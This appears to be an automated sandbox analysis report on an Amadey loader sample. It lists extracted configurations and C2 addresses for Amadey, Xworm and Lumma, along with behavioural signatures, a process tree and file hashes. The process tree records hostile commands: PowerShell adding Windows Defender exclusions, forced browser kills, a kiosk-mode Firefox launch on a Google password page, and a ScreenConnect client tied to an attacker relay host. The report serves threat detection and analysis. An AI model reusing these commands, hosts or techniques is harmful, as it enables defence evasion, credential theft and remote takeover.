Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2024 09:36

General

  • Target

    766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe

  • Size

    3.1MB

  • MD5

    74ba48529515c95320f4a86fc42fc668

  • SHA1

    c33b2b0c5e43e5ac274206ae964cf85bb8718048

  • SHA256

    766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa

  • SHA512

    16f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8

  • SSDEEP

    98304:XmP6PUaaDfBgWBPTrdEdsgxYC2JyLce9ebFyZgk6TR:XcqZexyV6T

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

C2

87.120.112.33:8398

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

Extracted

Family

lumma

C2

https://processhol.sbs/api

https://p10tgrace.sbs/api

https://peepburry828.sbs/api

https://3xp3cts1aim.sbs/api

https://p3ar11fter.sbs/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 14 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 22 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 38 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
    "C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3776
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Users\Admin\AppData\Local\Temp\1006867001\5480c36033.exe
        "C:\Users\Admin\AppData\Local\Temp\1006867001\5480c36033.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4356
      • C:\Users\Admin\AppData\Local\Temp\1006868001\3beeb94a45.exe
        "C:\Users\Admin\AppData\Local\Temp\1006868001\3beeb94a45.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1364
      • C:\Users\Admin\AppData\Local\Temp\1006869001\88de7f18a5.exe
        "C:\Users\Admin\AppData\Local\Temp\1006869001\88de7f18a5.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3468
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:996
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4696
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2856
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1912
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4400
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2660
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3932
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f03e3381-1927-431a-8d62-9f8ce9f9d797} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" gpu
              6⤵
                PID:2664
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2408 -prefMapHandle 2396 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {67b12b54-b285-4976-b247-054932237c31} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" socket
                6⤵
                  PID:2996
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1600 -childID 1 -isForBrowser -prefsHandle 1608 -prefMapHandle 1576 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3bc7a69-8da9-4e92-a9dc-538a55649980} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab
                  6⤵
                    PID:4964
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3824 -childID 2 -isForBrowser -prefsHandle 3512 -prefMapHandle 3196 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fd56ba8-6224-4eff-9c08-35149395ad74} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab
                    6⤵
                      PID:2592
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4724 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4736 -prefMapHandle 4820 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97ea9c59-ce1d-4946-93c8-7e97daaa65c8} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" utility
                      6⤵
                      • Checks processor information in registry
                      PID:5396
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4980 -childID 3 -isForBrowser -prefsHandle 5564 -prefMapHandle 4844 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4d7c7bb-28b6-41f5-9a51-bdfccee40555} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab
                      6⤵
                        PID:4400
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 4 -isForBrowser -prefsHandle 5744 -prefMapHandle 5752 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b2b389-f21c-4558-bbcf-3d92df6f95b3} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab
                        6⤵
                          PID:1012
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4992 -childID 5 -isForBrowser -prefsHandle 5908 -prefMapHandle 5912 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fb47717-ed13-4828-b85f-08f8883d4646} 3932 "\\.\pipe\gecko-crash-server-pipe.3932" tab
                          6⤵
                            PID:3332
                    • C:\Users\Admin\AppData\Local\Temp\1006870001\cedfdcc430.exe
                      "C:\Users\Admin\AppData\Local\Temp\1006870001\cedfdcc430.exe"
                      3⤵
                      • Modifies Windows Defender Real-time Protection settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1544
                    • C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe
                      "C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Drops startup file
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Adds Run key to start application
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: AddClipboardFormatListener
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:5352
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1006871001\document.exe'
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5800
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'document.exe'
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3500
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4984
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4980
                    • C:\Users\Admin\AppData\Local\Temp\1006872001\SupportClientSetup.exe
                      "C:\Users\Admin\AppData\Local\Temp\1006872001\SupportClientSetup.exe"
                      3⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4768
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                        4⤵
                        • Enumerates connected drives
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        PID:5376
                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4480
                • C:\Windows\system32\msiexec.exe
                  C:\Windows\system32\msiexec.exe /V
                  1⤵
                  • Enumerates connected drives
                  • Boot or Logon Autostart Execution: Authentication Package
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4908
                  • C:\Windows\syswow64\MsiExec.exe
                    C:\Windows\syswow64\MsiExec.exe -Embedding 0F2E1931E6BCE9D4FD7735C2AB7CF2EE C
                    2⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1056
                    • C:\Windows\SysWOW64\rundll32.exe
                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI267E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240658140 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      3⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:5768
                  • C:\Windows\system32\srtasks.exe
                    C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                    2⤵
                      PID:4116
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding 512489A4C919C5F0C987A00E598FB1E1
                      2⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2196
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding 81E4F2AA71C2315548B6CDA5524321D0 E Global\MSI0000
                      2⤵
                      • Loads dropped DLL
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:5260
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                    • Checks SCSI registry key(s)
                    PID:6128
                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                    "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=5ed15620-6a10-4859-92e3-6289630ddee0&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c="
                    1⤵
                    • Sets service image path in registry
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2432
                    • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                      "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "dd9f5058-994d-4dec-b37e-945955ff8ac5" "User"
                      2⤵
                      • Executes dropped EXE
                      PID:3328
                    • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                      "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "00e5e936-ca59-49e6-bbfa-6dc17ad7f596" "System"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      • Checks processor information in registry
                      • Modifies data under HKEY_USERS
                      PID:5096
                    • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                      "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "23fe1a14-be28-4648-b1bc-d5caa08f22a9" "System"
                      2⤵
                      • Executes dropped EXE
                      • Checks processor information in registry
                      • Modifies data under HKEY_USERS
                      PID:848
                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                    1⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5440
                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                    1⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5840

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Config.Msi\e585ee5.rbs

                    Filesize

                    214KB

                    MD5

                    99f171a8ded737d4d3e742ec54b8de15

                    SHA1

                    a67d5acdf724e726f933a677fdfe4623ed788f63

                    SHA256

                    f6944b74cbe5bf0cff5f9ecb964137a2ee239acec82877a83c95b38f0f615edc

                    SHA512

                    4c7e96c231d9d60f1defc69ef891159a09b5b9b98a7d33a327859ef5429bbd9779129eb2a8b93709ed501fd64d8f2842ea68504281455488ddccd1fedcc24b4f

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.en-US.resources

                    Filesize

                    227B

                    MD5

                    dfd0bdff874bb29b508f15bdd35cb6a3

                    SHA1

                    de772d64129e084d150d8087ccdac16ef97fb185

                    SHA256

                    38bdcc2ec25e7464dde7293b5a6ec64eea4b9d9f6fb8c36fdcc5677a6f55b721

                    SHA512

                    6addfae10478871085c796f2af5a11cd78088fc49b245df2229db7546973ff9a16785c72bf61f569e16a3e79f7f48ef8c1badb91313271d9515af3d3b4b759b0

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.resources

                    Filesize

                    12KB

                    MD5

                    3e2aaeb2cea70c3508085356777faf2e

                    SHA1

                    aaa701d78f61b061ce143fc32fb73a4809f1a665

                    SHA256

                    c0350217c247e02bc32838fdd89ec3ed25bdc0b995c0fbae99a169a07989662d

                    SHA512

                    840bbf782e1956eaaa99304b5c7f17a9003da4844bce03fc27c493a187cf1e19d28333f6919816b43352c408047e963ad1c21a242aa85716746f200e57342dd7

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.en-US.resources

                    Filesize

                    48KB

                    MD5

                    d524e8e6fd04b097f0401b2b668db303

                    SHA1

                    9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

                    SHA256

                    07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

                    SHA512

                    e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.resources

                    Filesize

                    26KB

                    MD5

                    5cd580b22da0c33ec6730b10a6c74932

                    SHA1

                    0b6bded7936178d80841b289769c6ff0c8eead2d

                    SHA256

                    de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

                    SHA512

                    c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll

                    Filesize

                    192KB

                    MD5

                    ae0e6eba123683a59cae340c894260e9

                    SHA1

                    35a6f5eb87179eb7252131a881a8d5d4d9906013

                    SHA256

                    d37f58aae6085c89edd3420146eb86d5a108d27586cb4f24f9b580208c9b85f1

                    SHA512

                    1b6d4ad78c2643a861e46159d5463ba3ec5a23a2a3de1575e22fdcccd906ee4e9112d3478811ab391a130fa595306680b8608b245c1eecb11c5bce098f601d6b

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll

                    Filesize

                    66KB

                    MD5

                    0402cf8ae8d04fcc3f695a7bb9548aa0

                    SHA1

                    044227fa43b7654032524d6f530f5e9b608e5be4

                    SHA256

                    c76f1f28c5289758b6bd01769c5ebfb519ee37d0fa8031a13bb37de83d849e5e

                    SHA512

                    be4cbc906ec3d189bebd948d3d44fcf7617ffae4cc3c6dc49bf4c0bd809a55ce5f8cd4580e409e5bce7586262fbaf642085fa59fe55b60966db48d81ba8c0d78

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe

                    Filesize

                    93KB

                    MD5

                    361bcc2cb78c75dd6f583af81834e447

                    SHA1

                    1e2255ec312c519220a4700a079f02799ccd21d6

                    SHA256

                    512f9d035e6e88e231f082cc7f0ff661afa9acc221cf38f7ba3721fd996a05b7

                    SHA512

                    94ba891140e7ddb2efa8183539490ac1b4e51e3d5bd0a4001692dd328040451e6f500a7fc3da6c007d9a48db3e6337b252ce8439e912d4fe7adc762206d75f44

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll

                    Filesize

                    254KB

                    MD5

                    5adcb5ae1a1690be69fd22bdf3c2db60

                    SHA1

                    09a802b06a4387b0f13bf2cda84f53ca5bdc3785

                    SHA256

                    a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

                    SHA512

                    812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe

                    Filesize

                    587KB

                    MD5

                    20ab8141d958a58aade5e78671a719bf

                    SHA1

                    f914925664ab348081dafe63594a64597fb2fc43

                    SHA256

                    9cfd2c521d6d41c3a86b6b2c3d9b6a042b84f2f192f988f65062f0e1bfd99cab

                    SHA512

                    c5dd5ed90c516948d3d8c6dfa3ca7a6c8207f062883ba442d982d8d05a7db0707afec3a0cb211b612d04ccd0b8571184fc7e81b2e98ae129e44c5c0e592a5563

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe.config

                    Filesize

                    266B

                    MD5

                    728175e20ffbceb46760bb5e1112f38b

                    SHA1

                    2421add1f3c9c5ed9c80b339881d08ab10b340e3

                    SHA256

                    87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

                    SHA512

                    fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll

                    Filesize

                    822KB

                    MD5

                    be74ab7a848a2450a06de33d3026f59e

                    SHA1

                    21568dcb44df019f9faf049d6676a829323c601e

                    SHA256

                    7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d

                    SHA512

                    2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\app.config

                    Filesize

                    1KB

                    MD5

                    2744e91bb44e575ad8e147e06f8199e3

                    SHA1

                    6795c6b8f0f2dc6d8bd39f9cf971bab81556b290

                    SHA256

                    805e6e9447a4838d874d84e6b2cdff93723641b06726d8ee58d51e8b651cd226

                    SHA512

                    586edc48a71fa17cdf092a95d27fce2341c023b8ea4d93fa2c86ca9b3b3e056fd69bd3644edbad1224297bce9646419036ea442c93778985f839e14776f51498

                  • C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\system.config

                    Filesize

                    949B

